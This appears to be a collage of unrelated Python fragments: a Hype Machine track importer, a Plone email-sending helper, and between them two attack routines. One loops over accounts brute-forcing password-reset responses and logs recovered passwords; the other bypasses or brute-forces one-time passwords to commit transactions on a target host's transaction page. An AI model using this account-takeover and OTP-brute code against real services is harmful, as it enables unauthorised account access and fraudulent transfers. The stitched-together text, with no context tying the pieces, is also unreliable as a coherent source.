    results = hypem.get_popular(filter='lastweek', page=1)
    LOGGER.info('Found {} tracks, merging to database...'.format(len(results.data)))
    try:
        for track in results.data:
            date_posted = datetime.fromtimestamp(track.data['dateposted'])
            # TODO: this is unpredictable because there are random postid's returned with
            # different loved and dateposted values
            hours_delta = (datetime.now() - date_posted).total_seconds() / 60 / 60
            source_score = int(track.data['loved_count'] / hours_delta)
            hypem_row = QueuedTrack(
                title=track.data['title'],
                artist=track.data['artist'],
                year=date_posted.year,
                source='hypemachine',
                source_score=source_score,
                duration=track.data['time'])
            session.merge(hypem_row)
    except:
        raise
    finally:
        session.commit()
    LOGGER.info('Merge completed.')
def run(self):
    while 1:
        self.generate_opener()
        account = RECOVER.get()
        LOGGER.info('Trying to recover: %s', account)
        if account in known_users:
            continue
        if not self.pre_test(account):
            LOGGER.info('Impossible to recover: %s', account)
            continue
        for i in xrange(1, 251):
            data = self.brute_one(account, i)
            if 'Identifier not found' in data:
                break
            if 'repeat' in data:
                continue
            result = NEW_PASSWORD.search(data)
            if result:
                data = self.do_login(account, result.group(1))
                if self.check(data):
                    LOGGER.critical('RECOVERED: %s %s', account, result.group(1))
                    add_good(account, result.group(1), data, self.opener)
                break
def do_otp(self, obj):
    data = self._pre_otp(obj)
    if data is False:
        return False
    step3 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                            urllib.urlencode({
                                'step': 'step3'
                            }))
    step4 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                            urllib.urlencode({
                                'step': 'step4'
                            }))
    # Case:
    # 1) No otp
    if 'Commit transaction.' in data:
        LOGGER.info('No otp')
        data = my_url_open(obj.opener, step3)
    # 2) SmartCard otp
    elif 'One-time password:' in data:
        LOGGER.info('Smart card otp')
        data = my_url_open(obj.opener, step4)
    # 3) Brute otp
    elif 'One-time password (#' in data:
        tmp_ticket = RE_TICKET.search(data)
        if not tmp_ticket:
            return False
        tmp_ticket = tmp_ticket.group(1)
        step_OTP1 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                                    urllib.urlencode({
                                        'step': 'step3',
                                        'OTP': obj.gen_otp(tmp_ticket, 2)
                                    }))
        step_OTP2 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                                    urllib.urlencode({
                                        'step': 'step3',
                                        'OTP': obj.gen_otp(tmp_ticket, 3)
                                    }))
        data = my_url_open(obj.opener, step_OTP1)
        data += my_url_open(obj.opener, step_OTP2)
        data = my_url_open(obj.opener, step4)
    else:
        LOGGER.error('Bad transaction page: ')
        LOGGER.debug('%r', data)
    result = 'Transaction committed!' in data
    if result:
        LOGGER.info('Transaction from: %s', obj.number)
    return result
def send(portal, message, subject, recipients=[]):
    """Send an email.

    this is taken from Products.eXtremeManagement
    """
    # Weed out any empty strings.
    recipients = [r for r in recipients if r]
    if not recipients:
        LOGGER.warn("No recipients to send the mail to, not sending.")
        return

    charset = portal.getProperty('email_charset', 'ISO-8859-1')
    # Header class is smart enough to try US-ASCII, then the charset we
    # provide, then fall back to UTF-8.
    header_charset = charset

    # We must choose the body charset manually
    for body_charset in 'US-ASCII', charset, 'UTF-8':
        try:
            message = message.encode(body_charset)
        except UnicodeError:
            pass
        else:
            break

    # Get the 'From' address.
    registry = getUtility(IRegistry)
    sender_name = registry.get('plone.email_from_name')
    sender_addr = registry.get('plone.email_from_address')

    # We must always pass Unicode strings to Header, otherwise it will
    # use RFC 2047 encoding even on plain ASCII strings.
    sender_name = str(Header(safe_unicode(sender_name), header_charset))
    # Make sure email addresses do not contain non-ASCII characters
    sender_addr = sender_addr.encode('ascii')
    email_from = formataddr((sender_name, sender_addr))

    formatted_recipients = []
    for recipient in recipients:
        # Split real name (which is optional) and email address parts
        recipient_name, recipient_addr = parseaddr(recipient)
        recipient_name = str(Header(safe_unicode(recipient_name), header_charset))
        recipient_addr = recipient_addr.encode('ascii')
        formatted = formataddr((recipient_name, recipient_addr))
        formatted_recipients.append(formatted)
    email_to = ', '.join(formatted_recipients)

    # Make the subject a nice header
    subject = Header(safe_unicode(subject), header_charset)

    # Create the message ('plain' stands for Content-Type: text/plain)
    # plone4 should use 'text/plain' according to the docs, but this should work for us
    # http://plone.org/documentation/manual/upgrade-guide/version/upgrading-plone-3-x-to-4.0/updating-add-on-products-for-plone-4.0/mailhost.securesend-is-now-deprecated-use-send-instead/
    msg = MIMEText(message, 'html', body_charset)
    msg['From'] = email_from
    msg['To'] = email_to
    msg['Subject'] = subject
    msg = msg.as_string()

    # Finally send it out.
    mailhost = getToolByName(portal, 'MailHost')
    try:
        LOGGER.info("Begin sending email to %r " % formatted_recipients)
        LOGGER.info("Subject: %s " % subject)
        mailhost.send(msg)
    except gaierror, exc:
        LOGGER.error("Failed sending email to %r" % formatted_recipients)
        LOGGER.error("Reason: %s: %r" % (exc.__class__.__name__, str(exc)))
    else:
        LOGGER.info("Successfully sent email to %r" % formatted_recipients)

# vim: set ft=python ts=4 sw=4 expandtab :